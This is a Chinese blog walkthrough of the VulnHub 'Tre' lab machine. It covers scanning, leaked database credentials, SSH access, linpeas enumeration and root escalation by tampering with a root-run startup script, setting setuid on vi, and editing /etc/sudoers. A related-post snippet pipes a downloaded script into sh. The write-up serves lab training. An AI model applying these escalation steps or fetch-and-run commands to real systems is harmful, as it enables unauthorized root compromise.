Tre靶场通关过程(linpeas使用+启动项编辑器提权)

最新推荐文章于 2024-01-06 23:48:57 发布
最新推荐文章于 2024-01-06 23:48:57 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: 从入门到入狱 文章标签: web安全 网络安全 php 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/130546015
版权

Tre靶场通关

通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集,根据已有信息进行提权。

靶机下载地址:

https://download.vulnhub.com/tre/Tre.zip

信息收集

靶机IP探测:192.168.0.129

arp-scan -l

在这里插入图片描述

端口扫描

nmap -p 1-65535 -sV -A 192.168.0.129
22
80
8082

在这里插入图片描述

目录扫描

python dirsearch.py -u "http://192.168.0.129"

在这里插入图片描述

info.php

在这里插入图片描述

adminer.php

在这里插入图片描述

dirsearch默认字典没扫除其他有用信息,看别人通关原来是字典的原因,利用dirb大字典扫描目录

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述

dirb扫描文件用以下命令

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt -X .php

在扫描的

http://192.168.0.129/mantisbt/config/ 目录下的a.txt文件发现数据库的信息

在这里插入图片描述

在这里插入图片描述

# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';

在adminer.php页面进行登录

在这里插入图片描述

找到了用户密码信息

在这里插入图片描述

其中Tre用户可以直接ssh登录

usr:tre
pwd:Tr3@123456A!

ssh tre@192.168.0.129

在这里插入图片描述

提权阶段

接下来对tre用户进行提权

主要学习下LinPEAS这个提权脚本(Linux/Unix/MacOS),同PEASS-ng里还有Windows的提权脚本WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh

LinPEAS是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。

该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置。

给执行权限,看一下命令参数

chmod 777 linpeas.sh
./linpeas.sh -h

在这里插入图片描述

开启http服务将脚本传到靶机

python -m http.server 80

靶机执行

wget http://192.168.0.130/linpeas.sh

在这里插入图片描述

给权限运行脚本,由于内容比较多输出到一个文件中方便查看

./linpeas.sh > 1.txt

在kali攻击机中将生成的文件拷贝出来

rsync -avz tre@192.168.0.129:/home/tre/1.txt /root/linpeas.txt

-a:保持原属性
-v:详细信息
-z:在传输文件时压缩减少网络带宽占用

对生成的报告文件进行分析

more linpeas.txt

内嵌了linux-exploit-suggester,可以根据扫描出的内核漏洞进行提权

在这里插入图片描述

发现存在一条/bin/bash /usr/bin/check-system的进程,是root用户启动的
在这里插入图片描述

查看check-system脚本

cat /usr/bin/check-system

在脚本中发现该脚本的作用是输出Service started at+当前日期,重定向到系统日志等级为info,之后跟了一段死循环一直Checking…让我们发现这个进程用的

在这里插入图片描述

不难判断这个一定是开机自启动项,验证一下

ls /etc/systemd/system
cat /etc/systemd/system/check-system.service

在这里插入图片描述

或者直接

systemctl list-unit-files | grep enable

在这里插入图片描述

提权思路有了:更改这个脚本给vi编辑器s权限,让服务器重启生效,通过vi修改/etc/passwd

有两个问题需要判断:

1.脚本是否有写权限(有)

在这里插入图片描述

2.服务器如何重启

发现tre用户有shutdown的sudo权限

在这里插入图片描述

利用命令重启

sudo shutdown -r now

发现条件都具备了,修改脚本

在这里插入图片描述

进行重启,重新连接,之后vi编辑器就具备了sudo权限,可以横着走了

想改/etc/passwd加一条用户

tpa:123456:0:0:tpa:/root:/bin/bash

但不知道为什么利用用户tpa和密码123456登录不上去

尝试其他方法,想到修改sudo权限,给tre用户增加全部命令的sudo权限

vi /etc/sudoers

在这里插入图片描述

直接利用sudo反弹到root,拿到flag

sudo /bin/bash

在这里插入图片描述

tpaer
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶机 TRE
m0_46580995的博客
09-23 404
目录爆破 adminer 4.7.7 版本不符 暴力破解目录 找到配置文件 ssh登录 查权限 s
linux提权
weixin_43873557的博客
02-10 409
gcc编译exp要使用相对应版本的机器,然后再上传 sudo /bin/bash vim /etc/netplan/50 修改ens33 netplan apply 修改键盘 vim /etc/default/keyb curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 01操作系统信息 ➢ 查看发行版本 cat
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 6183
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
Linpeas的简单使用
Themanager112的博客
01-06 1278
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
Tre靶机
小小猪的博客
07-02 313
Tre靶机 arp-scan -l 扫描靶机IP地址 namp -sV -Pn -A x.x.x.131 扫描靶机IP地址 扫描目录 访问info.php,看到数据库 nikto -h x.x.x.131进行网页扫描,可以看到system中登陆账号密码均是admin/admin; admin/admin登陆: 得到如下界面 访问mantisbt/config目录 这个密码可以在adminer.php登陆; 数据库中找到了 登录成功 可以看到
靶机渗透测试(Tre: 1)
@小张小张的博客
09-21 927
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Intermediate) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:182.168.10.175;
Tre靶机打靶过程及思路
qq_52610024的博客
07-21 1039
4.利用mantis密码重置漏洞进入到后台管理界面,在manage功能下再次发现ssh可登录的账号密码。3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库查看到可疑账号密码,2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功。5.查找其他账号下具有可写的root权限文件,找到一个系统的shell脚本,修改该脚本内容。6.成功得到shell,成功得到root权限,打靶完成。,ssh登录得到该账号,外围突破完成。1.常规端口及服务发现。.
HUBER+SUHNER推出MMBX超小型板间连接器
11-21
全球著名通讯传送产品制造商HUBER+SUHNER(灏讯中国)推出了一种可支持通讯射频单元中高综合、小型化应用的超小型同轴连接器:MMBX系列(MICRO MINIATURE BOARD CONNECTOR),它是具有盲插功能和工作余量的板对板、...
Chronometre-Intelligent:Chronomètre智慧型C + +编码器干部NXP-Cup
02-14
Projet dechronomètre智能 功能视频: ://youtu.be/crldIYV0MD8
labell:使用NLP + React + Webpack的简单静态关键字提取器Webapp
04-01
标签使用NLP + React + Webpack的简单静态关键字提取器WebappRaison d'être 快速获取博客文章的标签列表发展开始开发Web服务器: npm start 构建生产输出: npm run build部署方式使用部署从制作的图标
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
IBM使用的CFT工具
10-08
一个IBM服务器使用的PE工具,台式机和笔记本也可以使用
cloud-config-toolbox-ui:dCloud协作工具箱页面,用于管理像Cisco Answers这样的云演示配置
02-24
cloud-config-toolbox-ui dCloud Colud Configuration Web门户UI项目。 它使用Webpack 4在Vue.js 2.6(包括vue-router和vuex)上构建。 发展 用法 yarn以安装依赖项软件包yarn start构建库并使用热重载yarn build:test开始开发环境yarn build:test以构建生产文件并启动快速Web服务器以测试生产文件vue-devtools以启动Vue.js开发人员工具电子应用程序。 您将需要在全球范围内单独安装此工具,但是一旦可用,您就可以使用此命令行来监视Vue应用程序的状态和DOM详细信息。 此脚本仅在开发模式下添加到index.html。 智威汤逊 开发网站上的登录功能将提示您输入JWT,因为它无法重定向您真正的SSO提供程序。 您可以通过访问并登录,然后打开浏览器JavaScrip
MOBILE上运行的注册表查看器 tre082p
07-26
MOBILE上运行的注册表查看器 tre082p 留给自己备用
天任(TRE)TP系列触摸屏选型手册
03-19
天任(TRE)TP系列触摸屏选型手册.pdf 介绍了关于天任(TRE)TP系列触摸屏选型手册的详细说明,提供触摸屏的技术资料的下载。
实战打靶集锦-020-Tre
阿尔泰野狼的博客
05-18 644
本文记录了博主的一次曲折打靶经历,包含dirb挂在big.txt扫描,系统可执行脚本提权等。
vulnhub之tre1
weixin_54431413的博客
07-07 688
主要介绍突破边界的方法,已知漏洞的利用,Authorization:Basic YWRtaW46YWRtaW4=数据包头部登录验证,进阶目录爆破,以及通过shell脚本来提权
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2200
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
eresolve unable to resolve dependency tre
最新发布
02-29
解决 npm 安装依赖报错 ERESOLVE unable to resolve dependency tree 的方法有两种:使用 resolutions 或者使用 overrides。 1. 使用 resolutions:在项目的 package.json 文件中添加 resolutions 字段,并指定需要解决的依赖版本。例如: ```json { "name": "project", "version": "1.0.0", "dependencies": {}, "resolutions": { "react": "^18.2.0" } } ``` 这样可以强制指定 react 的版本为 18.2.0,解决依赖版本不一致的问题[^1]。 2. 使用 overrides:在项目的 package.json 文件中添加 overrides 字段,并指定需要解决的依赖版本。例如: ```json { "name": "project", "version": "1.0.0", "dependencies": {}, "overrides": { "react": "^18.2.0" } } ``` 这样可以覆盖第三方包指定的依赖版本,解决依赖版本不一致的问题。 总结起来,解决 ERESOLVE unable to resolve dependency tree 的方法有两种:使用 resolutions 或者使用 overrides。具体使用哪种方法取决于你的项目和依赖管理工具的版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值